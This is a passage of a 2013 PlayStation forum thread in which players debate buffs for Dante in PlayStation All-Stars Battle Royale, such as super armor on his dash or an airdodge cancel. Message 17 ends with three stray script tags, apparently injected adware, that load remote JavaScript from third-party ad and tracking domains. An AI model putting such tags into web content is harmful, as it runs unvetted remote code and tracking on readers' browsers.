Showing results for 
Search instead for 
Do you mean 
PlayStation MVP
2395 posts

Re: Dante dash, super armor?

Jan 28, 2013
Maybe they could just try and make dante cooler in this game. He lacks anything cool, in his supers and in his moveset. Then you go play MvC3 and he's like rocking a guitar and shooting a fireball out of his pistols and **bleep**:\
Please use plain text.
Message 11 of 19 (203 Views)
Treasure Hunter
5310 posts

Jan 28, 2013
Dante doesn't have a single good match-up in this game. All of them are typically bad match-ups for him.
Please use plain text.
Message 12 of 19 (200 Views)
0 Likes
Lombax Warrior
159 posts

Jan 28, 2013
My comment is in line with nocturnal. Seems Dante is on the spit end of any stick he's handed.
Please use plain text.
Message 13 of 19 (192 Views)
Lombax Warrior
95 posts

Jan 28, 2013
Image and video hosting by TinyPic
Image and video hosting by TinyPic
Please use plain text.
Message 14 of 19 (183 Views)
0 Likes
Lombax Warrior
178 posts

[ Edited ]
Jan 28, 2013

Dante vs. Jak may be the worst matchup of all time

Wait, no, if I don't correct myself Strife will post that video of Radec vs. Sly to prove me wrong-- Jak vs. Dante can be the second worst.

I felt bad for Dante, but also didn't want to lose. He definitely needs something against more agile characters. Reading suggestions from the thread, a brief invincibilty during a neutral angel dash may be helpful.

Please use plain text.
Message 15 of 19 (170 Views)
0 Likes
Lombax Warrior
159 posts

Jan 28, 2013
Any videos of a good jak vs a good Dante?
Please use plain text.
Message 16 of 19 (156 Views)
0 Likes
Gaming Beast
2167 posts

[ Edited ]
Jan 28, 2013

xFeyBlade wrote:
Anyone else think maybe adding super armor to Dantes dash might not be such a bad thing?

After watching asis vs pb mal, I had a decent epiphany. Dante has literally no way to beat someone who has a ranged attack and is faster than himself, like Cole. I main Cole, 999 and I find him to be a skilful character, however in the matchup vs Dante, Dante was at the mercy of Cole, outright, because of Coles speed and ranged initiates.

Dante needs something not much, but something. he has no safe way to approach and this might be something to make him a safer approach character rather than a punisher of mistskes. That's not Dante in my eyes, he should be pushing the pace all game, but he can't, its too unsafe. He has no ranged attacks, he needs this sort of minor boost to compete on an even level imo.
That sounds RIDICULOUSLY OP (For that move. It still wouldn't fix one of Dante's main problems). You literally could not stop his approach if you were to change this other than with a super. You just gave him a move with ridiculous mobility that can be canceled into either attacks or nothing at all, with super armor. You may even be able to empty cancel through attacks if you have ridiculous timing to punish! (Although considering how hard that would probably be to pull off, I don't actually mind that too much, though it would make counter redundant.) The only way to make that mildly balanced is to make it very very low super armor like BD's air charge, but in that case it's still going to lose to most projectiles.

Honestly if you want to buff Dante, I would rather see you either able to airdodge out of the Dash (Prefered change) or change something so that blocking doesn't destroy him so much.

EDIT: Actually I really like the idea of canceling the dash with an airdodge (It's much more punishable than aerial super armor, but also makes the dash much safer).

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Please use plain text.
Message 17 of 19 (149 Views)
0 Likes
PlayStation MVP
6387 posts

Jan 28, 2013
Well Dante is getting some kind of buff, so who knows he probably might get super armor.
Please use plain text.
Message 18 of 19 (140 Views)
0 Likes
Gaming Beast
1773 posts

[ Edited ]
Jan 28, 2013

I agree that Dante needs some way to deal with ranged characters. Other close quarter characters in PSASBR (like Heihachi, Raiden, Kratos, Nariko and Parappa) at least have some way of dealing with zoning.  

For example, they might have a ranged attack (Heihachi's trophy throw or beach ball, Nariko's disk or Cannon, Kratos' Bow) or an attack that quickly closes distance (Heihachi's wave-dashing, Parappa's Air Side Triangle, or Raiden's....everything). And if someone's trying to zone Parappa he could just pull out his Boom box  and farm AP, forcing his opponent to come to him!

But Dante...he really has close to no options. Maybe increasing the range & speed of his pistols (kind of like Fox's laser pistol from Smash) could help. Fox is a speedy melee character, similar to Dante. But if someone tries to zone him he has plenty of options for defending himself (reflector, laser pistol). Dante does not. Heck Dante's counter can't even deal with projectiles like Nariko's, Kratos', or Sly's can.

Please use plain text.
Message 19 of 19 (116 Views)
0 Likes